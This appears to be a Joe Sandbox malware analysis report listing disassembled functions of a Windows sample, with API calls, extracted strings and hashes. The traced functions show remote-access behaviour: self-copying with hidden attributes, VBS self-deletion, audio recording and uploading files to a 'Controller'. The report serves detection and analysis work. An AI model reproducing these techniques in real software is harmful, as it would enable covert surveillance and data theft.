                                              • PathFileExistsW.SHLWAPI(?), ref: 004125AD
                                              • GetTempPathW.KERNEL32(00000104,?), ref: 00412610
                                              • GetTempFileNameW.KERNEL32(?,temp_,00000000,?), ref: 0041262A
                                              • lstrcatW.KERNEL32(?,.exe), ref: 0041263C
                                                • Part of subcall function 0041C482: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,00466478,00000000,00000000,0040D434,00000000,00000000,fso.DeleteFile(Wscript.ScriptFullName)), ref: 0041C4C1
                                              • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 0041267C
                                              • Sleep.KERNEL32(000001F4), ref: 004126BD
                                              • OpenProcess.KERNEL32(00100000,00000000,00000000), ref: 004126D2
                                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004126DD
                                              • CloseHandle.KERNEL32(00000000), ref: 004126E4
                                              • GetCurrentProcessId.KERNEL32 ref: 004126EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$File$Create$CloseCurrentHandleObjectOpenPathSingleTempWait$ExecuteExistsExitMutexNameShellSleeplstrcat
                                              • String ID: .exe$0C[$WDH$exepath$open$temp_
                                              • API String ID: 2649220323-3545883927
                                              • Opcode ID: 1c913ae08a5e17ca5ba38718309b211a0371373e46d4682c3eff5b2ddab4b42e
                                              • Instruction ID: ea0e71dbd1735df2f0ffa6a76a18ae54bfb239dee3d1740714ca762960b89f4c
                                              • Opcode Fuzzy Hash: 1c913ae08a5e17ca5ba38718309b211a0371373e46d4682c3eff5b2ddab4b42e
                                              • Instruction Fuzzy Hash: 4C51C871A00215BBDB10ABA09C99EFE336D9B04715F1041ABF501E71D2EF7C8E858A5D
                                              Function 0041B0D8 Relevance: 40.4, APIs: 12, Strings: 11, Instructions: 180synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041B1CD
                                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041B1E1
                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,004660B4), ref: 0041B209
                                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00474EE0,00000000), ref: 0041B21F
                                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041B260
                                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041B278
                                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041B28D
                                              • SetEvent.KERNEL32 ref: 0041B2AA
                                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041B2BB
                                              • CloseHandle.KERNEL32 ref: 0041B2CB
                                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041B2ED
                                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041B2F7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped$NG
                                              • API String ID: 738084811-2094122233
                                              • Opcode ID: 1d877dcbc1b23002afbada965c9bddf541debd2a79e700171488071fa355c7d2
                                              • Instruction ID: 904a2ea9ee052b7cd0d2885f28b370526ea16529c5f4723dacad6ab52bd59ce6
                                              • Opcode Fuzzy Hash: 1d877dcbc1b23002afbada965c9bddf541debd2a79e700171488071fa355c7d2
                                              • Instruction Fuzzy Hash: 015193B12842056ED314B731DC96ABF779CDB80359F10053FB246621E2EF789D498AAE
                                              Function 00401A6D Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 156fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000), ref: 00401B03
                                              • WriteFile.KERNEL32(00000000,00000000,00000004,00000000,00000000), ref: 00401B13
                                              • WriteFile.KERNEL32(00000000,WAVE,00000004,00000000,00000000), ref: 00401B23
                                              • WriteFile.KERNEL32(00000000,fmt ,00000004,00000000,00000000), ref: 00401B33
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401B43
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B54
                                              • WriteFile.KERNEL32(00000000,00472AAA,00000002,00000000,00000000), ref: 00401B65
                                              • WriteFile.KERNEL32(00000000,00472AAC,00000004,00000000,00000000), ref: 00401B75
                                              • WriteFile.KERNEL32(00000000,00000001,00000004,00000000,00000000), ref: 00401B85
                                              • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401B96
                                              • WriteFile.KERNEL32(00000000,00472AB6,00000002,00000000,00000000), ref: 00401BA7
                                              • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401BB7
                                              • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401BC7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$Write$Create
                                              • String ID: RIFF$WAVE$data$fmt
                                              • API String ID: 1602526932-4212202414
                                              • Opcode ID: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                              • Instruction ID: e437df56db769974f3bb03b9acf3047b6271bea3308615ff466a61b001f8e6b8
                                              • Opcode Fuzzy Hash: bdde9fe629d6d0b3cb01441b1d036ed99aff71c5e0b2c5a0236a53ffdd76988e
                                              • Instruction Fuzzy Hash: D1413F72644218BAE210DB51DD85FBB7FECEB89B50F40441AFA44D60C0E7A5E909DBB3
                                              Function 004072AB Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000001,00407688,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000003,004076B0,8)[,00407709), ref: 004072BF
                                              • GetProcAddress.KERNEL32(00000000), ref: 004072C8
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 004072DD
                                              • GetProcAddress.KERNEL32(00000000), ref: 004072E0
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 004072F1
                                              • GetProcAddress.KERNEL32(00000000), ref: 004072F4
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00407305
                                              • GetProcAddress.KERNEL32(00000000), ref: 00407308
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 00407319
                                              • GetProcAddress.KERNEL32(00000000), ref: 0040731C
                                              • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040732D
                                              • GetProcAddress.KERNEL32(00000000), ref: 00407330
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                              • API String ID: 1646373207-1022880986
                                              • Opcode ID: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                              • Instruction ID: 405170eedd050388d8f538cead316ce70cca9a1d875d15a5a69166cce564cbe9
                                              • Opcode Fuzzy Hash: f3da3711bb85931ca03a42678d4c0c1881451176f862cc8ba737a85fa656c6e8
                                              • Instruction Fuzzy Hash: 0A0152A0E4431676D711AF7AAC44D577E9D9E41351311487BB405E2292EEBCE800CD6E
                                              Function 0044F4AD Relevance: 31.9, APIs: 17, Strings: 1, Instructions: 419COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$EnvironmentVariable$_wcschr
                                              • String ID: `#[
                                              • API String ID: 3899193279-4119260463
                                              • Opcode ID: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                              • Instruction ID: 2409d22e097b45b84bdb59948eb4ebc1cd1141af37d2d18b4001dba56dac1aed
                                              • Opcode Fuzzy Hash: a471c829ddd5e79256b59335d7b350d61db07916532beff835d4a4e17985a3d6
                                              • Instruction Fuzzy Hash: E3D135B1D003006FFB24AF799D82A6B7BA8EF01314F05417FE945A7382EB7D99098759
                                              Function 0040CE34 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _wcslen.LIBCMT ref: 0040CE42
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040CE5B
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000000,00000000,00000000,00000000,00000000,?,004750E4,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040CF0B
                                              • _wcslen.LIBCMT ref: 0040CF21
                                              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040CFA9
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000000,00000000), ref: 0040CFBF
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040CFFE
                                              • _wcslen.LIBCMT ref: 0040D001
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040D018
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,004750E4,0000000E), ref: 0040D068
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000001), ref: 0040D086
                                              • ExitProcess.KERNEL32 ref: 0040D09D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                              • String ID: 6$8)[$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe$del$open$xdF
                                              • API String ID: 1579085052-658302313
                                              • Opcode ID: 1f26a9a137c80f5632c92eb2222ab7f2ba6ebdcc1e6d02a5e4a10b2a6e82a7e9
                                              • Instruction ID: 98553dc1b0994f0aa09194d7cf3a18af63584d9ff732256a229fdfb73b573f5c
                                              • Opcode Fuzzy Hash: 1f26a9a137c80f5632c92eb2222ab7f2ba6ebdcc1e6d02a5e4a10b2a6e82a7e9
                                              • Instruction Fuzzy Hash: 3151E820208302ABD615B7359C92A6F679D9F8471DF00443FF60AA61E3EF7C9D05866E
                                              Function 00445DD7 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 296COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$Info
                                              • String ID: v%(/
                                              • API String ID: 2509303402-2435473048
                                              • Opcode ID: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                              • Instruction ID: 03d8b0dccc9171d7b4ee81f85837dfa1205ba0d7832ce976ccf3d084d520ac26
                                              • Opcode Fuzzy Hash: 6f6fc0ac27b4b2f00b1102b51bee0220b0be09f2ed36c41455f2b0a14b53fe9c
                                              • Instruction Fuzzy Hash: AFB1CE719002059FEB21DF69C881BEEBBF4BF09304F15842EF495A7242DB79AC458B69
                                              Function 0041C0AC Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                              Download Yara Rule
                                              APIs
                                              • lstrlenW.KERNEL32(?), ref: 0041C0C7
                                              • _memcmp.LIBVCRUNTIME ref: 0041C0DF
                                              • lstrlenW.KERNEL32(?), ref: 0041C0F8
                                              • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041C133
                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041C146
                                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041C18A
                                              • lstrcmpW.KERNEL32(?,?), ref: 0041C1A5
                                              • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041C1BD
                                              • _wcslen.LIBCMT ref: 0041C1CC
                                              • FindVolumeClose.KERNEL32(?), ref: 0041C1EC
                                              • GetLastError.KERNEL32 ref: 0041C204
                                              • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041C231
                                              • lstrcatW.KERNEL32(?,?), ref: 0041C24A
                                              • lstrcpyW.KERNEL32(?,?), ref: 0041C259
                                              • GetLastError.KERNEL32 ref: 0041C261
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                              • String ID: ?
                                              • API String ID: 3941738427-1684325040
                                              • Opcode ID: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                              • Instruction ID: 8d48ee17a24f37a9bc83e71ffc922dd471ae74eb47091415c6e266b1ff6a60c4
                                              • Opcode Fuzzy Hash: f867a525b16976b99bb039d508de341a2eaf9024ee8651fbc1bead663617605c
                                              • Instruction Fuzzy Hash: B541A671584316EBD720DFA0DC889DBB7ECEB84745F00092BF545D2162EB78CA88CB96
                                              Function 00412AEF Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 482sleepfileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00412B08
                                                • Part of subcall function 0041BA09: GetCurrentProcessId.KERNEL32(00000000,75923530,00000000,?,?,?,?,00466478,0040D248,.vbs,?,?,?,?,?,004752F0), ref: 0041BA30
                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(004040F5,?,?,004040F5,00465E84), ref: 004185B9
                                                • Part of subcall function 004185A3: CloseHandle.KERNEL32(00465E84,?,?,004040F5,00465E84), ref: 004185C2
                                              • Sleep.KERNEL32(0000000A,00465E84), ref: 00412C5A
                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84), ref: 00412CFC
                                              • Sleep.KERNEL32(0000000A,00465E84,00465E84,00465E84), ref: 00412D9E
                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E00
                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E37
                                              • DeleteFileW.KERNEL32(00000000,00465E84,00465E84,00465E84), ref: 00412E73
                                              • Sleep.KERNEL32(000001F4,00465E84,00465E84,00465E84), ref: 00412E8D
                                              • Sleep.KERNEL32(00000064), ref: 00412ECF
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                              • String ID: /stext "$,aF$0TG$0TG$NG$NG
                                              • API String ID: 1223786279-4119708859
                                              • Opcode ID: 343cbf9aefdd623e373a270c20123973470b35741413067b7c4455ca9677ab1d
                                              • Instruction ID: 10d3359c81a21c2239512d2238f4034584c87ebec4848cfd83014516dee20f06
                                              • Opcode Fuzzy Hash: 343cbf9aefdd623e373a270c20123973470b35741413067b7c4455ca9677ab1d
                                              • Instruction Fuzzy Hash: 2F0268315083414AC325FB62D891AEFB3E5AFD4348F50483FF58A931E2EF785A49C65A
                                              Function 00408BB5 Relevance: 23.1, APIs: 8, Strings: 5, Instructions: 328fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00408D1E
                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 00408D56
                                              • __aulldiv.LIBCMT ref: 00408D88
                                                • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 00408EAB
                                              • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408EC6
                                              • CloseHandle.KERNEL32(00000000), ref: 00408F9F
                                              • CloseHandle.KERNEL32(00000000,00000052), ref: 00408FE9
                                              • CloseHandle.KERNEL32(00000000), ref: 00409037
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreateLocalPointerReadSizeTime__aulldivsend
                                              • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $xdF$NG
                                              • API String ID: 3086580692-3944908133
                                              • Opcode ID: d1236d5277051a74a8d0eb1d924e96be3c8a686d98197a44253422edb13a818e
                                              • Instruction ID: 3fce176daff91a8ac67d7e00268aa6ddaa8eb0a69c3dc15cdf5b3728eb075172
                                              • Opcode Fuzzy Hash: d1236d5277051a74a8d0eb1d924e96be3c8a686d98197a44253422edb13a818e
                                              • Instruction Fuzzy Hash: CCB1A1316083409BC314FB26C941AAFB7E5AFC4358F40492FF589622D2EF789945CB8B
                                              Function 0041D620 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 74windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041D66B
                                              • GetCursorPos.USER32(?), ref: 0041D67A
                                              • SetForegroundWindow.USER32(?), ref: 0041D683
                                              • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041D69D
                                              • Shell_NotifyIconA.SHELL32(00000002,00474B48), ref: 0041D6EE
                                              • ExitProcess.KERNEL32 ref: 0041D6F6
                                              • CreatePopupMenu.USER32 ref: 0041D6FC
                                              • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041D711
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                              • String ID: Close
                                              • API String ID: 1657328048-3535843008
                                              • Opcode ID: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                              • Instruction ID: ffebe08b42ddc2cad69fc5dc181b4667ce265f065f51bc56e4a7814a85689449
                                              • Opcode Fuzzy Hash: 2cdbc08d807d068952302bab703dbbbb7de86244cd36d8f377370d21a5bc842f
                                              • Instruction Fuzzy Hash: 2D213BB1544209FFDF155FA4ED0EAAA3F35EB08302F000125F909951B2D779EDA1EB19
                                              Function 0040D83A Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 148COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041288B: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                                • Part of subcall function 0041288B: WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                                • Part of subcall function 00413733: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 0041374F
                                                • Part of subcall function 00413733: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00413768
                                                • Part of subcall function 00413733: RegCloseKey.KERNEL32(00000000), ref: 00413773
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D894
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00466478,00466478,00000000), ref: 0040D9F3
                                              • ExitProcess.KERNEL32 ref: 0040D9FF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
